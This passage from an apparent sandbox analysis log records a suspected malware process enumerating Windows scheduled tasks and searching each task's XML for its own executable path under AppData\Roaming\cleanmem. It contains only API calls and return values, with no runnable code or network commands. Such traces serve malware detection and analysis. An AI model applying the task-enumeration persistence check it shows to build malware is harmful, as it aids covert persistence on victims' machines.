false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n") returned 0x0 [0137.931] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.931] IUnknown:Release (This=0x127090) returned 0x0 [0137.931] IUnknown:Release (This=0x126f40) returned 0x0 [0137.931] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0137.933] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.933] IUnknown:Release (This=0x126f40) returned 0x0 [0137.933] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.933] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.933] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0137.935] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0137.935] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0137.935] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0 [0137.935] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n") returned 0x0 [0137.938] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.938] IUnknown:Release (This=0x1270a0) returned 0x0 [0137.938] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0137.938] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0 [0137.938] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n") returned 0x0 [0137.944] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.944] IUnknown:Release (This=0x1270a0) returned 0x0 [0137.944] IUnknown:Release (This=0x126f40) returned 0x0 [0137.944] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0137.945] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.945] IUnknown:Release (This=0x126f40) returned 0x0 [0137.945] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.945] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.945] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0137.947] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0137.947] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0137.947] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="Notifications") returned 0x0 [0137.947] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n") returned 0x0 [0137.949] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.950] IUnknown:Release (This=0x127080) returned 0x0 [0137.950] IUnknown:Release (This=0x126f30) returned 0x0 [0137.950] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0137.951] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.951] IUnknown:Release (This=0x126f30) returned 0x0 [0137.951] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.951] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.951] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0137.953] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0137.953] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.953] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="WinSAT") returned 0x0 [0137.953] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n 2008-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n") returned 0x0 [0137.956] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n 2008-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.956] IUnknown:Release (This=0x127090) returned 0x0 [0137.956] IUnknown:Release (This=0x126f40) returned 0x0 [0137.956] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0137.958] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.958] IUnknown:Release (This=0x126f40) returned 0x0 [0137.958] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.958] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.958] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0137.974] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=21) returned 0x0 [0137.974] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.974] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="ActivateWindowsSearch") returned 0x0 [0137.974] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n") returned 0x0 [0137.976] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.977] IUnknown:Release (This=0x127090) returned 0x0 [0137.977] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.977] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="ConfigureInternetTimeService") returned 0x0 [0137.977] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n") returned 0x0 [0137.979] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.979] IUnknown:Release (This=0x127090) returned 0x0 [0137.979] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.979] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="DispatchRecoveryTasks") returned 0x0 [0137.979] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n") returned 0x0 [0137.981] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.982] IUnknown:Release (This=0x127090) returned 0x0 [0137.982] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.982] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="ehDRMInit") returned 0x0 [0137.982] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n") returned 0x0 [0137.984] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.984] IUnknown:Release (This=0x127090) returned 0x0 [0137.984] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.984] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="InstallPlayReady") returned 0x0 [0137.984] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n") returned 0x0 [0137.986] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.987] IUnknown:Release (This=0x127090) returned 0x0 [0137.987] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.987] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="mcupdate") returned 0x0 [0137.987] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0137.989] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.989] IUnknown:Release (This=0x127090) returned 0x0 [0137.989] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.989] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="MediaCenterRecoveryTask") returned 0x0 [0137.989] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n") returned 0x0 [0137.992] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n 